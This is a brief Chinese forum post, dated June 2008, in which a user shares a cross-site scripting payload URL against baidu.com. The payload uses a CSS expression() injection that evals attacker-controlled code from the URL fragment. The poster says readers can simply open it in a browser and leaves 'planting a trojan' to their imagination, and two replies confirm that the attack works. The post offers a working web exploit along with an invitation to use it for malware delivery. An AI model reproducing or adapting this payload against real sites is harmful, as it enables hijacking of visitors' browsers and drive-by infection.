By:茄子宝
ps:直接浏览器访问即可,至于挂马吗?自己发挥吧。
ps:直接浏览器访问即可,至于挂马吗?自己发挥吧。
http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28121212%29
rice
June 24, 2008 01:40
跨站成功,希望大家小心哈!
Vmrg
June 23, 2008 20:15
是新漏洞吗?
Pages: 1/1
1

